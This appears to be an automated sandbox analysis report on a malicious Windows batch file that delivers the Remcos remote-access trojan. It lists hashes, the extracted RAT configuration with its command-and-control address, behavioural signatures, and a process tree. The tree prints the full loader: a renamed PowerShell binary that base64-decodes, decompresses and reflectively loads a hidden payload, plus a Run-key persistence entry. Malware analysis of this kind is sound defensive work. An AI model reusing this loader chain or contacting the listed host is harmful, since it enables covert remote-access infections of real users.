Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
04-10-2024 22:33
Static task
static1
Behavioral task
behavioral1
Sample
Cobro_714908746632292158322869967546175789167005896538554858756104291.bat
Resource
win7-20240903-en
General
-
Target
Cobro_714908746632292158322869967546175789167005896538554858756104291.bat
-
Size
1.6MB
-
MD5
ef049bc637c98aa00c35467c7a02afcb
-
SHA1
b2d498988a2375d988d096466faaf4faafc038ec
-
SHA256
7f8daa38efb7829976dc3a14dc840a4ccfd312df6e335e3b1620c6f0e9535621
-
SHA512
0e10f6c8cd229b4cf26657ccb5f3a41c2ab3ffc6c0606654e95dc645d1bb40799fdebf255ee0814d6a83371be78cf026d4ebaeee5ac35b49413e36ae41ecd5eb
-
SSDEEP
24576:c2UCeOG76RFbdt4km7EoWbKMu2HpNexVcVfpIeD47I79nwS4/pfapm40iQc4VOkp:cv7Ibb/1bKKHpNexVwzrhtfLg
Malware Config
Extracted
remcos
PqVps
103.35.190.90:2405
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
LogHost.dat
-
keylog_flag
false
-
keylog_folder
LogHost
-
mouse_option
false
-
mutex
RmcVps-HIX6ZI
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4480 created 3464 4480 Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje 56 -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 112 attrib.exe -
Executes dropped EXE 1 IoCs
pid Process 4480 Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Srcs = "C:\\Users\\Admin\\AppData\\Roaming\\Srcs.bat" Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4480 set thread context of 436 4480 Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje 89 -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 4480 Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje 4480 Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje 4480 Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4480 Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje Token: SeDebugPrivilege 4480 Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 436 InstallUtil.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2708 wrote to memory of 220 2708 cmd.exe 85 PID 2708 wrote to memory of 220 2708 cmd.exe 85 PID 2708 wrote to memory of 1708 2708 cmd.exe 86 PID 2708 wrote to memory of 1708 2708 cmd.exe 86 PID 2708 wrote to memory of 112 2708 cmd.exe 87 PID 2708 wrote to memory of 112 2708 cmd.exe 87 PID 2708 wrote to memory of 4480 2708 cmd.exe 88 PID 2708 wrote to memory of 4480 2708 cmd.exe 88 PID 2708 wrote to memory of 4480 2708 cmd.exe 88 PID 4480 wrote to memory of 436 4480 Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje 89 PID 4480 wrote to memory of 436 4480 Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje 89 PID 4480 wrote to memory of 436 4480 Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje 89 PID 4480 wrote to memory of 436 4480 Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje 89 PID 4480 wrote to memory of 436 4480 Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje 89 PID 4480 wrote to memory of 436 4480 Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje 89 PID 4480 wrote to memory of 436 4480 Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje 89 PID 4480 wrote to memory of 436 4480 Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje 89 PID 4480 wrote to memory of 436 4480 Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje 89 PID 4480 wrote to memory of 436 4480 Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje 89 PID 4480 wrote to memory of 436 4480 Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje 89 PID 4480 wrote to memory of 436 4480 Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje 89 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 112 attrib.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3464
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Cobro_714908746632292158322869967546175789167005896538554858756104291.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:220
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje3⤵PID:1708
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\Users\Admin\AppData\Local\Temp\Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:112
-
-
C:\Users\Admin\AppData\Local\Temp\Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.OjeC:\Users\Admin\AppData\Local\Temp\Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje -WindowStyle hidden -command "$Dqvarshu = get-content 'C:\Users\Admin\AppData\Local\Temp\Cobro_714908746632292158322869967546175789167005896538554858756104291.bat' | Select-Object -Last 1; $Optnhxx = [System.Convert]::FromBase64String($Dqvarshu);$Lkxze = New-Object System.IO.MemoryStream( , $Optnhxx );$Zhqhumhc = New-Object System.IO.MemoryStream;$Efwnhmiankp = New-Object System.IO.Compression.GzipStream $Lkxze, ([IO.Compression.CompressionMode]::Decompress);$Efwnhmiankp.CopyTo( $Zhqhumhc );$Efwnhmiankp.Close();$Lkxze.Close();[byte[]] $Optnhxx = $Zhqhumhc.ToArray();[Array]::Reverse($Optnhxx); $Zjiqawmtdc = [System.AppDomain]::CurrentDomain.Load($Optnhxx); $Inmzsxjtyul = $Zjiqawmtdc.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Inmzsxjtyul.DeclaringType, $Inmzsxjtyul.Name).DynamicInvoke() | Out-Null"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4480
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:436
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
198B
MD5265bb7e3df83ba7a9eeb9ca4e7bb2ba8
SHA11cebca4022d6ac6abe8e7a95283aca01f02d705a
SHA25665ec87390b3fbfad582aaca3ad4e985905f17e48b89ea7fcd33e3ec554b67a29
SHA512d1c653fa2f8e682103e21fb00ebc5e1f4e60c18940e9a2f9938fbdb1c998394f66217802f2a38fb7689c3b390f7fcf269d7ef79ed3b4546e7b57147754076891
-
C:\Users\Admin\AppData\Local\Temp\Cobro_714908746632292158322869967546175789167005896538554858756104291.bat.Oje
Filesize423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82